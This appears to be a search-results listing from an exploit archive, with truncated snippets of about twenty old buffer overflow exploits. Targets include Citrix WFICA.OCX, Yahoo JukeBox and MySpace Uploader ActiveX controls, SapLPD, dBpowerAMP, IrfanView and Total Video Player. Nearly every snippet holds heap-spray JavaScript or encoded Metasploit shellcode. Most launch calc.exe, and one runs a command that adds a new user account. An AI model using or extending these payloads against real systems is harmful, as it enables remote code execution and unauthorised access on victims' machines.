7259 matches found
Citrix Presentation Server Client WFICA.OCX ActiveX Heap BOF Exploit
No description provided by source. !-- Citrix Presentation Server Client WFICA.OCX ActiveX Component Heap Buffer Overflow Exploit Vulnerability discovered by Andrew Christensen and Aaron Portnoy http://www.securityfocus.com/bid/21458 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6334...
IBM Domino Web Access Upload Module - Overwrite (SEH)
IBM Domino Web Access Upload Module Universal BoF Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +...
citrix-overflow.txt
Citrix Presentation Server Client WFICA.OCX ActiveX Component Heap Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +...
facebookexp-overflow.txt
var shellcode = unescape"%u0D0D%u0D0D%u9090%u9090"+ //Windows Execute Command calc "%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b"+ "%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca"+ "%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b"+...
Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow
Citrix Presentation Server Client WFICA.OCX ActiveX Component Heap Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +...
Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow
Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow Citrix Presentation Server Client WFICA.OCX ActiveX Component Heap Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var...
ImageStation (SonyISUpload.cab 1.0.0.38) ActiveX BOF Exploit
Exploit for unknown platform in category remote exploits ============================================================ ImageStation SonyISUpload.cab 1.0.0.38 ActiveX BOF Exploit ============================================================ ImageStation SonyISUpload.cab 1.0.0.38 ActiveX Buffer...
Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ===================================================================== Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit ===================================================================== ///add su one, user: sun pass:...
SapLPD 6.28 (Windows x86) - Remote Buffer Overflow
/ http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html Exploit for SapLPD 6.28 Win32 by BackBone Tested with SapLPD 6.28 on Windows XP SP2 Groetjes aan mijn sletjes Ops,Doop,Gabber,head,ps,sj,dd en de rest! / include include include pragma comment lib,"ws232" define...
dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow Exploit
No description provided by source. dBpowerAMP Audio Player Release 2 Remote Buffer Overflow Exploit $nop= "x90" x 65; win32exec - CMD=cmd /k net user /add secur frog Size=188 http://metasploit.comhttp://metasploit.com 253 my $shellcode = "x29xc9x83xe9xd7xd9xeexd9x74x24xf4x5bx81x73x13x6c"...
SapLPD 6.28 Remote Buffer Overflow Exploit (win32)
Exploit for unknown platform in category remote exploits ================================================== SapLPD 6.28 Remote Buffer Overflow Exploit win32 ================================================== / http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html Exploit fo...
SapLPD 6.28 Remote Buffer Overflow Exploit (win32)
No description provided by source. / http://lists.grok.org.uk/pipermail/full-disclosure/2008-February/060042.html Exploit for SapLPD 6.28 Win32 by BackBone Tested with SapLPD 6.28 on Windows XP SP2 Groetjes aan mijn sletjes Ops,Doop,Gabber,head,ps,sj,dd en de rest! / include stdio.h include...
dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow Exploit
Exploit for unknown platform in category remote exploits ================================================================== dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow Exploit ================================================================== dBpowerAMP Audio Player Release 2 Remot...
yahoomusic-overflow.txt
// HeapSpray - execute calculator calc.exe shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" + "%u3058%u3142%u4250%u6b41%u4142%u4253%u4232%u3241" + "%u4141%u4130%u5841%u3850%u4242%u4875%u6b69%u4d4c" +...
Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow
Yahoo! JukeBox MediaGrid ActiveX Control mediagrid.dll AddBitmap Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" +...
Total Video Player 1.03 - .m3u File Local Buffer Overflow
Total Video Player 1.03 - .m3u File Local Buffer Overflow /0day Total Video Player V1.03 .m3u file Local Buffer Overflow In this exploit you chose to bind a port or to spawn calc.exe. After I crafted a playlist I observed that the stack got corrupted. The corruption accured in some points,and...
MySpace Uploader - MySpaceUploader.ocx 1.0.0.4 Remote Buffer Overflow
MySpace Uploader - MySpaceUploader.ocx 1.0.0.4 Remote Buffer Overflow MySpace Uploader Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 =...
IrfanView 4.10 - '.fpx' Memory Corruption
/ IrfanView 4.10 .FPX File Memory Corruption This exploit launches calc.exe. Tested against Win XP SP2 FR. Have Fun! Coded and discovered by Marsu Other bugs exist... / include "stdio.h" include "stdlib.h" include "string.h" / win32exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvS...
iphone-dos.txt
function Demo var shellcode; var addr; var fill; alert'attempting a crash!'; shellcode = unescape'%u0c0c'; fill = unescape'%ucccc'; addr = 0x02020202; var b = fill; while b.length...
Gateway WebLaunch - ActiveX Remote Buffer Overflow
Gateway WebLaunch Buffer Overflow Exploit function Check // win32exec - EXITFUNC=seh CMD=c:\windows\system32\calc.exe Size=378 Encoder=Alpha2 http://metasploit.com var shellcode1 = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949" + "%u4948%u4949%u4949%u4949%u4949%u4949%u5a51%u436a" +...